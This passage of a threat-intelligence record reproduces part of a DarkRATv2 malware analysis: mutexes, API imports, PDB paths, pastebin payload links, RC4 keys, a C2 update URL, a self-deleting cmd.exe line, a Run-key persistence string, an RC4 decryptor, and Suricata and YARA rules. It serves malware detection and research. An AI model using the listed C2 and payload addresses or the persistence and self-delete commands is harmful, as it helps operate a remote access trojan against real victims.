50\n\nLocal\\RCw33291\r\nLocal\\1RCw3329\r\nLocal\\Qq0sfw23\r\nLocal\\EznTvkbq\r\nLocal\\3CC2ryd2\r\nLocal\\3mCUq1z\r\nLocal\\8jCPd9d\r\nLocal\\eWjMV\r\nLocal\\DvzjZ\r\nLocal\\VvSVp\r\nLocal\\PSBQv\r\nLocal\\hkrrI\r\nLocal\\EgMJa\r\nLocal\\ViZWD\r\nLocal\\YhxUy\r\nLocal\\fWySU\r\nLocal\\ujBPF\r\nLocal\\dLjaI\r\nLocal\\LnOtv\r\nLocal\\qxMBo\r\nLocal\\GTQAG\r\nLocal\\YUMMY\r\nLocal\\kCHLu\r\nLocal\\GBqea\r\nLocal\\qreaO\r\nLocal\\eWjMV\r\nLocal\\ejZbw\r\nLocal\\mLBas\r\nLocal\\gFvHS\r\nLocal\\dtrps\r\nLocal\\UeXeS\r\nLocal\\tGlfz\r\nLocal\\qawsedc\r\nLocal\\mutextest\r\nLocal\\qwertqewyt\r\nLocal$myprogram$\r\nSuspicious API calls\r\nCheckRemoteDebuggerPresent\r\nCreateProcess\r\nCreateThread\r\nCreateToolhelp32Snapshot\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 39 of 50\n\nGetCurrentProcess\r\nGetProcAddress\r\nGetThreadContext\r\nGetTickCount\r\nGetModuleHandle\r\nIsDebuggerPresent\r\nLoadLibrary\r\nNtUnmapViewOfSection\r\nOpenProcess\r\nProcess32First\r\nProcess32Next\r\nReadProcessMemory\r\nResumeThread\r\nSetThreadContext\r\nShellExecuteA\r\nURLOpenBlockingStreamA\r\nVirtualAlloc\r\nVirtualFree\r\nVirtualProtect\r\nWriteProcessMemory\r\nPDBs\r\nC:\\Users\\darkspider\\source\\repos\\darkrat_hiddendesktop\\Release\\Client.pdb\r\nC:\\Users\\darkspider\\source\\repos\\DarkRat2.0.1\\Release\\DarkRat2.0.1.pdb\r\nC:\\Users\\darkspider\\source\\repos\\melt\\Release\\melt.pdb\r\nC:\\Users\\darkspider\\Desktop\\DarkRatCoding\\darkrat\\bot\\Release\\test.pdb\r\nC:\\Users\\darkspider\\Desktop\\DarkRatCoding\\darkrat\\bot\\Release\\Builder.pdb\r\nC:\\Users\\darkspider\\Desktop\\DarkRat Coding\\darkrat\\bot\\Debug\\test.pdb\r\nC:\\Users\\darkspider\\Desktop\\TinyNuke-master\\Bin\\int32.pdb\r\nC:\\Users\\darkspider\\Desktop\\TinyNuke-master\\Bin\\int64.pdb\r\nC:\\Users\\user\\Documents\\darkrat_coding\\bot\\Release\\test.pdb\r\nC:\\Users\\timl8\\Desktop\\DarkRat2\\darkrat-master\\test\\Release\\test.pdb\r\nD:\\High-End\\darkrat-master_Bot-17-6-2019\\darkrat-master\\bot\\Release\\test.pdb\r\nD:\\High-End\\darkrat-master-2-6-2019\\darkrat-master\\bot\\Release\\test.pdb\r\nC:\\Users\\RIG\\Desktop\\VB.NET\\hf\\DArkRAt v2\\Client\\Client\\obj\\Debug\\Client.pdb\r\nD:\\DarkRat\\plugintester\\Release\\Monero_cpu.pdb\r\nD:\\DarkRat\\plugintester\\Release\\hvnc.pdb\r\nC:\\darkrat-master\\bot\\Release\\test.pdb\r\nC:\\Users\\lllll\\Desktop\\darkrat-master\\bot\\Release\\test.pdb\r\nC:\\Users\\lllll\\Desktop\\DarkCrypter-master\\Debug\\Stub.pdb\r\nPastebins\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 40 of 50\n\nhttps://pastebin.com/raw/YBGEBviB\r\nhttps://pastebin.com/raw/wAEXNbVF\r\nhttps://pastebin.com/raw/EusfX8PQ\r\nhttps://pastebin.com/raw/J7vpbEz6\r\nhttps://pastebin.com/raw/Yd76WVbu\r\nhttps://pastebin.com/raw/Qq0sfw23\r\nhttps://pastebin.com/raw/YBGEBviB\r\nhttps://pastebin.com/raw/RCw33291\r\nhttps://pastebin.com/raw/3CC2ryd2\r\nhttps://pastebin.com/raw/WeThNNxK\r\nhttps://pastebin.com/raw/NdUjPC1w\r\nhttps://pastebin.com/raw/DPXyyALg\r\nhttps://pastebin.com/raw/muEbW4SF\r\nhttps://pastebin.com/raw/m2h5tLBG\r\nhttps://pastebin.com/raw/JyTUuzPa\r\nhttps://pastebin.com/raw/EznTvkbq\r\nhttps://pastebin.com/raw/H5UZsfyw\r\nhttps://pastebin.com/raw/dNqyCpKw\r\nhttps://pastebin.com/raw/MmBK5bMH\r\nhttps://pastebin.com/raw/HemhJqcW\r\nhttps://pastebin.com/raw/i1wTNE8w\r\nhttps://pastebin.com/raw/R40x8Ax1\r\nhttps://pastebin.com/raw/Xh46Jxgb\r\nhttps://pastebin.com/raw/pt3fxyTg\r\nhttps://pastebin.com/raw/FYN0sb2Z\r\nhttps://pastebin.com/raw/RT7Yd0U4\r\nhttps://pastebin.com/raw/WRBztEKi\r\nhttps://pastebin.com/raw/vy8c6ZYT\r\nhttps://pastebin.com/raw/xZtv1ER4\r\nhttps://pastebin.com/raw/AYNnn2Rh\r\nhttps://pastebin.com/raw/d1vxjfbT\r\nhttps://pastebin.com/raw/hinKe47j\r\nhttps://pastebin.com/raw/LNpvG48f\r\nhttps://pastebin.com/raw/0cyRbYZx\r\nhttps://pastebin.com/raw/nQPFBUWs\r\nhttps://pastebin.com/raw/x2fWhy40\r\nRC4 Encryption keys\r\n28BED2E43A51F81DB74F9318BA1F1A1F\r\nwzXnjDj3i0pLHGhZJGMAkAdKLCpCDygH\r\n1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN3\r\n0x176B24B4c871Df6e0fE4E0c735Db075064b47Bc4\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 41 of 50\n\n1YqsiIPGf3mCzRuKqo46ZohUKeZFzTDH\r\n9C7BF1FECCE2AA3AA2F424178FD7\r\nagO2mW7VAEV2wxPHaU6FqIu18ZOvOkIC\r\nG29kZBPCKtzCc0IEWGNFssjPfFIoKasv\r\npZ2bEq15zrxIecBpXGR1TqjTSrvOgJiq\r\nDE4E24E3E9DEF1F54C1816AC26C18\r\n65s8fe8484sf6es8f4\r\nT9KTz7WlxDIwQ9mZbGTYnjsmAfaniwId\r\nTLBLz7KVoeWxOtvBuRsmEWVtiCdjgUDomUDd\r\nksuGN8Sm9Yi3BzN6E/yZ5/SfMWC0YFkp9Ot9\r\nGHyufDShu65hgduFGd98igfdp56hJugodf2\r\nKP9JHafuX8LZlfXe7r58vK8IxRhULkND\r\nLnqWwGjc3WIioIDbEQUUVHfuVNCgxSI1\r\n5POeBkhLRpl6NfFkxavzAYAhHVi5AD5E\r\nKouYwnCjHFjJcACwDTLiVW0tinMYVqxi\r\nSx4UDJ3HAlxNCiy1Xmvj8L8n84iqiFcr\r\ntMJJl1hIGXmbDZOQP3bUf4xI1Mj97OQa\r\ngNRyjhyuPpRc63DQIGtCMO6WXDRKxIft\r\nFA27B3E1FE89C2FC184158616C51E\r\n9DFF1BB88566612A34154A5A9D15F8\r\npAZukXJiQWqvGZOWCVbsEgZxhTP8inmp\r\nk7HkixO7Lvw84dwvYpZjSQxGqiEzjrbiahjU\r\nG29kZBPCKtzCc0IEWGNFssjPfFIoKasv\r\nKQCNAeDrybuzrcHcgjvrpr1b5yBz3K4PHsA\r\nGsjxvL85BkvzMLX2M4fL9EfF1ofGv88u\r\nq-}=6{)BuEV[GDeZy\u003e\r\n5d41cf10s8gkirunmvnjadf541fvc2yk\r\neEqsFu818cs1pgZsrYCUkX2VDNhqOuqf\r\n1z0X3SrAJX2AphwscBsOifBXoFGPIlAN\r\nRudtfLhumk1Xf7WRTFfPyd0hkoU9yrec\r\nPastebin responses\r\n2.0.1;http://35.204.135.202/update.zip\r\n2.1.3;http://35.204.135.202/update.zip\r\n4x+9ZolpV9+wS1xxlSmTQfPTglBPsSCsMhq3ceGt\r\ngh3nhIKYFaODSrZHXDnzSpo5a6uR1FkMSIpy5g==\r\nP0W0jVz9V+mZHlZn8hdG7StZ0IRo18Mi8gwrLWQ=\r\nOzE7OWprZGp9e3djcWF4YnxlYHF6NzY0OiwjMA==\r\n8GWOsCTVGdIXE7TlkX0A+50WXcdEfzHdbTSWVNr5\r\nXMtmuwemloM7PN8+9lgqowiS7Q36UkY3RthKWg==\r\nEQKv4vx/Q0GD9AjrLI+LrnXEfUVrs+52mPHvY4VaPHnt+A1TGg==\r\nAWtxLpEyiaQQitH0C4cvlXddVtquBWulwyOAAaUM\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 42 of 50\n\n89xoOk5h6JAJbplpn0plrlRI+a0pK9mEedupppY=\r\n2SN57pHzmmAc6WhkQPy/OEicdpjdkrG2IhXZyRditw==\r\n2SN57pHzmjZLsyM2HaniaVPdKcaD06b8IQXNzwY=\r\n2SN57pHzmjNIqjwzAqz/fl/GN4bRjaH8IwQ=\r\nP9qpEUWRPpy/X1nMoQCI5p4Y01fWcD26WPkA==\r\nIw+s940h3m8Zjd7mcnammzxV4+XZOn2RM0uZZV6H\r\n#7%;y~d.8(1\u003e8,7?'89\u00262?;�,\"~9\u0026 \u003e\u0026\"?\r\n#%7;kld7(.?6e2,\u0026~1. 6.\"7\r\nhc7BzjmDmm4+ROP4fF6rlDp0bz3d3oAxLWv+AiU=\r\ndk7D50YwGDUIzVlxfIMv7MvHyMSx+hhPr1YIiQ4=\r\nysXaSHDTtL90P60xvENuELmkmwVIWHQuwWTc\r\nTLBLz7KVoeC0IMTHvwY+Fnt1gzghy0P4jUbMyOI=\r\nZjfaMpfAyNn7Brw0ajZOqR71gAbEUeZ87uNDzT6BUzk9hjVruTGFwKgi\r\nk7HkixO7LqFlu4dlJtAiUFAL7jl4xLXyfh7Fyj0=\r\ntATvtchuYALVBVr+LkH4wKsKpGjIP42OplF0MZrXL+uIpQFNQA==\r\n5MWttHDEgA6/IK4iQFngwpmSeisqgJqWGH0sV0k=\r\niZ0rCLOxPeo1t7bR9X2OFUmqXd+6SxDGRsW5Wg==\r\nyQSaXNknA8x40o9QZjAM28BKOmm7gP5jlbYi7g==\r\nt8gca6tBA2QfGrZgaKcE/CLSmY6QId3MGeGLU4w=\r\nprCtUtZ/lz5V8auJmiRIQjCz60v2l6hz1ei7vzKM5TCyYw==\r\nm93fZdUWpDO95QSK6VEGFUUT/XFQHhWe/tSj4g==\r\nkeRwrh9WFcFmQWyJNMSKvR5ROys5oFT0QSbi88w=\r\n9jeIQeCYYPMLCZMpaXSM8x9D3reSZd+VDuE8+pgC\r\nt8gca6tBAzJIS/onN+df43yZ3JXRa97cDeea\r\nwGRmv2tlFuI1ZrqQzqeuVNMGLcF7ltc=\r\nScripts\r\n# RC4 decryptor\r\npastebin = '3CC2ryd2'\r\ndecrypted = file('3CC2ryd2.clean','wb')\r\nkey = 'DE4E24E3E9DEF1F54C1816AC26C18'\r\nwith open (pastebin, \"rb\") as pb:\r\n data = pb.read()\r\n S = range(256)\r\n j = 0\r\nfor i in range(256):\r\n j = (j + S[i] + ord(key[i % len(key)])) % 256\r\n S[i] , S[j] = S[j] , S[i]\r\ni = 0\r\nj = 0\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 43 of 50\n\nfor char in data:\r\n i = ( i + 1 ) % 256\r\n j = ( j + S[i] ) % 256\r\n S[i] , S[j] = S[j] , S[i]\r\n decrypted.write(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))\r\ndecrypted.close()\r\nSandbox links\r\nhttps://hybrid-analysis.com/sample/1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b9637c92cd07814\r\nhttps://hybrid-analysis.com/sample/8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5472bee692f\r\nhttps://app.any.run/tasks/1f4898f6-f168-45f6-9cde-f4fc3108f6d6/\r\nhttps://app.any.run/tasks/4a2be20e-5b9b-4dce-bcbb-6654ccf7458d/\r\nhttps://app.any.run/tasks/76a61009-b93c-404f-b9dd-c5d211c2456b/\r\nhttps://app.any.run/tasks/abe2a17b-7d35-4e68-811d-945f5fa58d7c/\r\nhttps://app.any.run/tasks/cdcc07a8-4bb7-4db2-b14f-e0559273c71f/\r\nhttps://app.any.run/tasks/aab8736c-8dc5-4ad0-ba70-5b15c568a47d/\r\nhttps://app.any.run/tasks/205d250e-d807-48aa-943b-922d11b1212b/\r\nhttps://cape.contextis.com/analysis/84762/\r\nhttps://cape.contextis.com/analysis/84812/\r\nhttps://cape.contextis.com/analysis/85291/\r\nOther ASCII strings\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\r\n2.1.3 (2.2.0)\r\ncmd.exe\r\nwscript.exe\r\nStartup failed, error:\r\nRequest failed, error:\r\ncmd.exe /C ping 127.0.0.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"%s\"\r\nSOFTWARE\\Microsoft\\Cryptography\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v2.0.50727\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v3.0\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v3.5\r\nSOFTWARE\\Microsoft\\Net Framework Setup\\NDP\\v4\r\nSOFTWARE\\Microsoft\\Cryptography\r\nMachineGuid\r\nWindows\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 44 of 50\n\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\r\nWinSystem32\r\nNtUnmapViewOfSection\r\nIsWow64Process\r\ncmd.exe /k start\r\n\\Microsoft\\Windows\\\r\nAPPDATA\r\n.exe\r\n/C start\r\nC:\r\nkillpersistence\r\nPOST\r\nrequest=\r\nContent-Type: application/x-www-form-urlencoded\r\ntext/plain\r\n\u0026taskid=\r\n\u0026taskstatus=\r\nMozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko)\r\nVersion/5.1 \u003e Mobile/9A334 Safari/7534.48.3\r\npastebin.com/raw/\r\nhttps://\r\nhttp://\r\nftp://\r\ninstalled\r\nopen\r\nrestart\r\nfailed\r\nsuccess\r\ntodo\r\nSuricata rules\r\n#By James_inthe_box\r\nalert tcp any any -\u003e any $HTTP_PORTS (msg:\"Darkrat Initial Request\"; flow:to_server,established;\r\ncontent:\"POST\"; http_method; content:\"request\"; http_uri; content:\"request=\"; http_client_body;\r\nreference:url,github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2;\r\nclasstype:trojan-activity; sid:20166304; rev:1; metadata:created_at 2019_08_15;)\r\nET TROJAN Win32/DarkRAT CnC? Activity\r\nhttps://doc.emergingthreats.net/bin/view/Main/2027886\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"ET TROJAN Win32/DarkRAT CnC? Activity\";\r\nflow:established,to_server; content:\"POST\"; http_method; content:!\".php\"; http_uri;\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 45 of 50\n\ncontent:!\"Mozilla\"; http_user_agent; pcre:\"/^[A-Za-z0-9]{3,10}$/Vs\";\r\ncontent:\"request=YUhkcFpEM\"; http_client_body; depth:17; fast_pattern;\r\npcre:\"/^[A-Za-z0-9\\/\\+\\=]{100,}$/PRsi\"; http_header_names; content:!\"Referer\";\r\nmetadata: former_category MALWARE;\r\nreference:url,github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2; classtype:trojan-activity; sid:\r\nYARA rules\r\n# need to clean it up a bit\r\nrule darkratv2\r\n{\r\nmeta:\r\nauthor = \"Albert Zsigovits\"\r\nstrings:\r\n$pdb = \"C:\\\\Users\\\\darkspider\" ascii wide\r\n$cmd = \"cmd.exe /C ping 127.0.0.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \\\"%s\\\"\" ascii wide\r\n$guid1 = \"SOFTWARE\\\\Microsoft\\\\Cryptography\" ascii wide\r\n$guid2 = \"MachineGuid\" ascii wide\r\n$persi1 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" ascii wide\r\n$persi2 = \"WinSystem32\" ascii wide\r\n$bin = \"pastebin.com/raw/\" ascii wide\r\n$import0 = \"NtUnmapViewOfSection\" ascii wide\r\n$import1 = \"WriteProcessMemory\" ascii wide\r\n$import2 = \"ResumeThread\" ascii wide\r\n$import3 = \"GetNativeSystemInfo\" ascii wide\r\n$import4 = \"URLOpenBlockingStream\" ascii wide\r\n$import5 = \"VirtualFree\" ascii wide\r\n$import6 = \"VirtualAlloc\" ascii wide\r\n$import7 = \"GetModuleHandle\" ascii wide\r\n$import8 = \"LoadLibrary\" ascii wide\r\n$import9 = \"CreateMutex\" ascii wide\r\n$vbs0 = \"Set objShell = WScript.CreateObject(\\\"WScript.Shell\\\")\" ascii wide\r\n$vbs1 = \"Set objWMIService = GetObject(\\\"winmgmts:\\\\\\\\\\\" \u0026 sComputerName \u0026 \\\"\\\\root\\\\cimv2\\\"\r\n$vbs2 = \"Set objItems = objWMIService.ExecQuery(sQuery)\" ascii wide\r\n$vbs3 = \"sQuery = \\\"SELECT * FROM Win32_Process\\\"\" ascii wide\r\n$vbs4 = \"wscript.exe\" ascii wide\r\n$net0 = \"POST\" ascii wide\r\n$net1 = \"\u0026taskid=\" ascii wide\r\n$net2 = \"\u0026taskstatus=\" ascii wide\r\n$net3 = \"\u0026spreadtag=\" ascii wide\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 46 of 50\n\n$net4 = \"\u0026operingsystem=\" ascii wide\r\n$net5 = \"\u0026arch=\" ascii wide\r\n$net6 = \"\u0026cpuName=\" ascii wide\r\n$net7 = \"\u0026gpuName=\" ascii wide\r\n$net8 = \"\u0026botversion=\" ascii wide\r\n$net9 = \"\u0026antivirus=\" ascii wide\r\n$net10 = \"\u0026netFramework4=\" ascii wide\r\n$net11 = \"\u0026netFramework35=\" ascii wide\r\n$net12 = \"\u0026netFramework3=\" ascii wide\r\n$net13 = \"\u0026netFramework2=\" ascii wide\r\n$net14 = \"\u0026installedRam=\" ascii wide\r\n$net15 = \"\u0026aornot=\" ascii wide\r\n$net16 = \"\u0026computername=\" ascii wide\r\n$net17 = \"hwid=\" ascii wide\r\n$net18 = \"request=\" ascii wide\r\ncondition:\r\n$pdb or $cmd or ( all of ($guid*) and all of ($persi*) ) or ( 3 of ($vbs*) ) or ( all of ($im\r\n}\r\nrule Darkrat_bin\r\n{\r\n meta:\r\n description = \"Darkrat\"\r\n author = \"James_inthe_box\"\r\n reference = \"https://github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2\"\r\n date = \"2019/08\"\r\n maltype = \"RAT\"\r\n \r\n strings:\r\n $string1 = \"Set objShell = WScript.CreateObject(\\\"WScript.Shell\\\")\"\r\n $string2 = \"\u0026taskstatus=\"\r\n $string3 = \"network reset\"\r\n $string4 = \"text/plain\"\r\n $string5 = \"\u0026antivirus=\"\r\n $string6 = \"request=\"\r\n $string7 = \"\u0026arch=\"\r\n \r\n condition:\r\n uint16(0) == 0x5A4D and all of ($string*) and filesize \u003c 600KB\r\n}\r\n \r\nrule Darkrat_mem\r\n{\r\n meta:\r\n description = \"Darkrat\"\r\n author = \"James_inthe_box\"\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 47 of 50\n\nreference = \"https://github.com/albertzsigovits/malware-writeups/tree/master/DarkRATv2\"\r\n date = \"2019/08\"\r\n maltype = \"RAT\"\r\n \r\n strings:\r\n $string1 = \"Set objShell = WScript.CreateObject(\\\"WScript.Shell\\\")\"\r\n $string2 = \"\u0026taskstatus=\"\r\n $string3 = \"network reset\"\r\n $string4 = \"text/plain\"\r\n $string5 = \"\u0026antivirus=\"\r\n $string6 = \"request=\"\r\n $string7 = \"\u0026arch=\"\r\n \r\n condition:\r\n all of ($string*) and filesize \u003e 600KB\r\n}\r\nOther YARA rules: https://pastebin.com/es915exd\r\nHashes\r\nSHA256 Compiled Size\r\n07c41d2bdb251269b0883b0880068f1480443e4fbd0c9e6f4e5b1b5004148d1c 991232\r\n08c63d13d117642c4fda82efd1e4a3ba1468ba6d07eb73a80c96e666701fa004\r\n13 Jun 2019\r\n18:17:13 UTC\r\n414720\r\n0e4a6a03b442efc5ae976ed57d66704e3a6c3393792adc1c1fe6a24d2da2352c\r\n16 Jun 2019\r\n21:29:36 UTC\r\n415744\r\n0f98572f3fa5b70f51c5d090ff4414e0771414cea3309df33d97e9d675847f69\r\n29 Jun 2019\r\n05:44:02 UTC\r\n411648\r\n1273fd18cfbe2f3caef7b29f749eb14b09cbd48a33e4c24c75c1486a416f66bd\r\n22 Jun 2019\r\n17:33:27 UTC\r\n929280\r\n148a5bcaaea8c74e8871ef82e2e6af584d91ae6ddb4d3b36b710ea0ac41ca999\r\n23 Apr 2019\r\n18:49:43 UTC\r\n272897\r\n1cc4577bbf9ca53ff285ea00ae41288a56e35d4472a97e4d7d65b749bce6ef11\r\n01 Aug 2019\r\n16:00:19 UTC\r\n418304\r\n1e318e24a9548f5d41ae49e76416b7f5b817393a0cd2c2aa2b9637c92cd07814\r\n02 Jul 2019\r\n19:07:48 UTC\r\n411648\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 48 of 50\n\n2856f4ff4ac68e06b8712cdb8f8a5319c95d1e2479edf2b80e0d7fd9c2b2e80a\r\n11 May 2018\r\n01:32:07 UTC\r\n560128\r\n2d2402ec680759b43efb1f1e0bc298e88c34da475b49237dede926a67587b5d0\r\n29 Jul 2019\r\n22:05:33 UTC\r\n411648\r\n2810b3924fe9d1f1642bc02c93e06391076341c8c7f8821da95f8a5b3bb14fa7\r\n26 Jul 2019\r\n20:40:31 UTC\r\n411648\r\n2856f4ff4ac68e06b8712cdb8f8a5319c95d1e2479edf2b80e0d7fd9c2b2e80a\r\n11 May 2018\r\n01:32:07 UTC\r\n560128\r\n30689bc02dd60fb674bd2e7f08fa2192d8cbeb94c8ae4c42617a698d53f1781a\r\n09 Jun 2019\r\n18:31:55 UTC\r\n414208\r\n3328f642826f94536ec3db7387be182bdb38c85bc4df23e422d1de465573c6b9\r\n04 Aug 2019\r\n17:03:01 UTC\r\n417727\r\n413fad039e9690ecc857d1c8cf90e132d521cc71d068f4286226affd66daa6e9\r\n12 May 2018\r\n14:19:21 UTC\r\n502784\r\n72e2948d99856cc42584d095ce79202d4de3141e197d4a94c1e7f3b325c0d4b5\r\n09 Jul 2019\r\n20:04:11 UTC\r\n412160\r\n763793e5725b92f61fbba97d15c8ded2817fb2623171a2db7eef94be5cc6729c\r\n26 Jul 2019\r\n20:42:02 UTC\r\n411648\r\n88aab5d336162ec7acc074535966fc665c85f286bc652f884fd4a25dcdb1f37b\r\n22 Jun 2019\r\n17:33:27 UTC\r\n410624\r\n8b1049117f561f5d4cf56258c7ca17551148e2c63af154ba04d96e1373d7dca0\r\n05 Nov 2018\r\n16:55:31 UTC\r\n525824\r\n8fc0120d9711a19292966c48e2eb367f26c2d874ab9fa4fd5cf7f5472bee692f\r\n05 Jul 2019\r\n17:55:16 UTC\r\n411648\r\n947461d7441512286618a6742282c2de9825d8295af0b5559bc6520711f476af\r\n03 Jun 2019\r\n19:45:15 UTC\r\n475880\r\n9e65fa0964f3a81940ad88cb3652207e5ad050ac6aa8cadc9ae08f140b354b5f\r\n09 May 2018\r\n18:54:19 UTC\r\n531456\r\na521906d8d60d94b14c63012d8ba7ded69b7bb5bde161c62bce8cc6e78434f8f\r\n26 Jul 2019\r\n20:42:02 UTC\r\n177664\r\nbac3002b2f86de531ad50ac9163cad514bbc9d910cfce5fa3e0d6fb13589f05e\r\n26 Apr 1998\r\n12:47:14 UTC\r\n556935\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 49 of 50\n\ncfa7f5ad7247d7d70fbbf4dce873fda9646e1964324e518030793ffa939dbd09\r\n09 Jun 2019\r\n18:31:55 UTC\r\n410096\r\nd07f601b72c6f91c1689141934a1c13a256a283db28e0982202e61d7c07b3abb\r\n23 Apr 2019\r\n21:05:04 UTC\r\n272385\r\ne5d48c09723b9de123a30c7b1b91987707fc51abcbf97578d7f9d9012157d28d\r\n03 Aug 2019\r\n21:02:54 UTC\r\n418304\r\nf1803ca741edac689dc4bb3cc20d30ea79cdb5198d58347ea71d25ed40c0fec7\r\n22 Jun 2019\r\n17:33:27 UTC\r\n410624\r\nf7d4c818939899d54b44929950c3e2b331b3787ceb8f72451c8bc375e0d79ac7\r\n26 Jul 2019\r\n20:42:02 UTC\r\n411648\r\nfd07d37e18bc922e5d92aeca2267efeec02599a0e35bfaa1d5dce9e27fae735d\r\n04 Aug 2019\r\n17:03:01 UTC\r\n417792\r\nSource: https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nhttps://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md\r\nPage 50 of 50", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md" ], "report_names": [ "README.md" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434292, "ts_updated_at": 1775791458, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/eb9be9938eee5ca90410ed40086bc036d0b3104f.pdf", "text": "https://archive.orkl.eu/eb9be9938eee5ca90410ed40086bc036d0b3104f.txt", "img": "https://archive.orkl.eu/eb9be9938eee5ca90410ed40086bc036d0b3104f.jpg" } }